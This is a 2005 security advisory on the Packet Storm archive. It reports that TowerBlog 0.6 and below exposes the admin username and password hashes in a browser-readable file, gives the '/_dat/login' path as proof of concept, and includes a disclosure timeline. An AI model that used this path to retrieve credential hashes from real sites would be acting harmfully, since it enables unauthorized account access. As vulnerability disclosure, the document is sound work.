what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

towerBlog06.txt

towerBlog06.txt
Posted Apr 18, 2005
Authored by CorryL | Site x0n3-h4ck.org

TowerBlog versions 0.6 and below allows for remote access of the administrative password hash.

tags | advisory, remote
SHA-256 | c0f316cb7aa0bee4f3c9604080646ef61a3da5dddf1f138aa4035337587e7b17

towerBlog06.txt

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ TowerBlog <= 0.6 ]=-
-=[
]=-
-=[ Author: CorryL x0n3-h4ck.org ]=-
-=[
]=-
-=[-----------------------------------------------------]=-


-=[+] Application: TowerBlog
-=[+] Version: 0.6
-=[+] Vendor's URL: https://tower.hybryd.org/?x=home
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: view admin account
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck


..::[ Descriprion ]::..

TowerBlog is, in short, a single user web-log (or web journal if you will)
content management system, aka CMS.
While there are many others out there
(MovableType and GreyMatter as linked amongst the others)
none quite filled my own personal needs and desires.
Mind you, this isn't meant to be an insult to the other CMS' out there,
I myself used both MovableType and GreyMatter extensively for some time,
however no system I could find was as powerful as I needed, nor as easily
expanded.
The only one that came close, was PHPNuke, but it was too bulky and bloated
for my needs.




..::[ Bug ]::..

this application and' he/she cuts to a type of bug that would allow to an
attacker
to come in possession of very precious information as user and admin pass.
This and' caused because' the data related to the admin acount are saved in
a text file,
that and' easily visible on the browser.


..::[ Proof Of Concept ]::..

https://host/path of blog/_dat/login

189bbbb00c5f1fb7fba9ad9285f193d1 << UserName Admin
81dc9bdb52d04dc20036dbd8313ed055 << Password Admin


the result I am the relative users and admin password in md5,
the first one corresponds to the user, the second to the password




..::[ Disclousure Timeline ]::..

[10/04/2005] - Vendor notification
[10/04/2005] - Vendor Response
[10/04/2005] - Public disclousure

CorryL
corryl80@gmail.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck

_________________________________
www.seekstat.it is your web stat
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close